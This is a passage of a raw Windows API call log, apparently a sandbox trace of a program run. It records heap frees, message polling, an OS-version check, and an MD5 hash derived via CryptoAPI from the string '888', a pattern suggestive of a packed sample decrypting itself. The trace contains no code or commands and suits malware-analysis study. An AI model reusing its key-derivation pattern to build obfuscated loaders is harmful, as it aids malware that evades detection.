1 [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.402] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0113.402] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.402] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.402] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.402] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.402] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0113.402] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0113.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.403] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.403] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.403] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0113.403] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.404] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0113.404] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0113.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0113.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0113.404] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.404] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.405] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.405] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0113.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0113.405] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.405] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.405] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0113.405] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.405] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0113.405] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0113.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0113.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0113.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7220, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0113.405] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf440) returned 1 [0113.406] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.406] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.406] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0113.406] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.406] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0113.406] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.406] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.406] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.406] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.406] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.406] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.407] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0113.407] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.407] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0113.407] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.407] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0113.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.407] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0113.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.407] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0113.407] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.407] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0113.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.408] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.408] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.408] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.408] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.408] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.408] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0113.408] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.408] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0113.408] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.408] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.408] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.408] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.408] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.408] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.408] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.408] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.408] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0113.409] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.409] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0113.409] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.409] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa498, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0113.409] CryptCreateHash (in: hProv=0x9bf440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0113.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0113.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0113.409] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0113.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, 